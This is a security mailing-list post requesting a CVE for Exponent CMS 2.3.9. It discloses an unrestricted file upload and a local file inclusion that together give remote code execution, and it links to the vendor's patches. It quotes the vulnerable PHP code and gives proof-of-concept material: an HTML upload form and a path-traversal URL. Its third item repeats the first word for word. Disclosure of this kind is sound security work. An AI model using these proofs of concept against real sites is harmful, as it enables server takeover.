oss-sec mailing list archives
CVE request:Exponent CMS 2.3.9 Unrestricted File Upload RCE and Local File include vulnerability
From: "DM_" <contact () x0day me>
Date: Wed, 21 Sep 2016 10:08:21 +0800
Hi, This is YongXiao Ma of Silence's PKAV Team. I reported some security issues to ExponentCMS some days ago. # Test environment exponent version: latest 2.3.9 php: 5.5.x server: apache 2.2.x # Details 1. Unrestricted File Upload there is a unrestricted file upload issue at framework/modules/forms/controllers/formsController.php and the upload file is located at /tmp/, where php script can be executed. although we dont know file name, but we can brute it simply, such as time() + "_" + upload name. public function import_csv_mapper() { //Check to make sure the user filled out the required input. if (!is_numeric($this->params["rowstart"])) { unset($this->params["rowstart"]); $this->params['_formError'] = gt('The starting row must be a number.'); expSession::set("last_POST", $this->params); header("Location: " . $_SERVER['HTTP_REFERER']); exit('Redirecting...'); } if (!empty($this->params['forms_id'])) { // if we are importing to an existing form, jump to that step $this->import_csv_data_mapper(); } else { //Get the temp directory to put the uploaded file $directory = "tmp"; //Get the file save it to the temp directory if ($_FILES["upload"]["error"] == UPLOAD_ERR_OK) { // $file = file::update("upload",$directory,null,time()."_".$_FILES['upload']['name']); $file = expFile::fileUpload("upload", false, false, time() . "_" . $_FILES['upload']['name'], $directory.'/'); //FIXME quick hack to remove file model .... POC: <!DOCTYPE html> <html> <form action="http://localhost/exponent-2.3.9/index.php?controller=forms&action=import_csv_mapper&forms_id=1&rowstart=0" method="POST" enctype ="multipart/form-data"> <input type="file" name="upload"> <input type="submit" name="submit"> </form> </html> 2. LFI then LFI comes, at exponent-2.3.9/install/popup.php. <?php $page = (isset($_REQUEST['page']) ? expString::sanitize($_REQUEST['page']) : ''); if (is_readable('popups/' . $page . '.php')) { include('popups/' . $page . '.php'); } ?> so we can upload a php file, then include it to make a RCE again. POC: http://127.0.0.1/exponent-2.3.9/install/popup.php?page=../../files/test 3. Unrestricted File Upload and RCE there is a unrestricted file upload issue at framework/modules/forms/controllers/formsController.php and the upload file is located at /tmp/, where php script can be executed. although we dont know file name, but we can brute it simply, such as time() + "_" + name. public function import_csv_mapper() { //Check to make sure the user filled out the required input. if (!is_numeric($this->params["rowstart"])) { unset($this->params["rowstart"]); $this->params['_formError'] = gt('The starting row must be a number.'); expSession::set("last_POST", $this->params); header("Location: " . $_SERVER['HTTP_REFERER']); exit('Redirecting...'); } if (!empty($this->params['forms_id'])) { // if we are importing to an existing form, jump to that step $this->import_csv_data_mapper(); } else { //Get the temp directory to put the uploaded file $directory = "tmp"; //Get the file save it to the temp directory if ($_FILES["upload"]["error"] == UPLOAD_ERR_OK) { // $file = file::update("upload",$directory,null,time()."_".$_FILES['upload']['name']); $file = expFile::fileUpload("upload", false, false, time() . "_" . $_FILES['upload']['name'], $directory.'/'); //FIXME quick hack to remove file model .... POC: <!DOCTYPE html> <html> <form action="http://localhost/exponent-2.3.9/index.php?controller=forms&action=import_csv_mapper&forms_id=1&rowstart=0" method="POST" enctype ="multipart/form-data"> <input type="file" name="upload"> <input type="submit" name="submit"> </form> </html> # Patches https://exponentcms.lighthouseapp.com/projects/61783/changesets/355702a9835cf527796c9d469a82258b7639148a https://exponentcms.lighthouseapp.com/projects/61783/changesets/628ea61834d92611644a1dfc1ba24216ee647c59
Current thread:
- CVE request:Exponent CMS 2.3.9 Unrestricted File Upload RCE and Local File include vulnerability DM_ (Sep 20)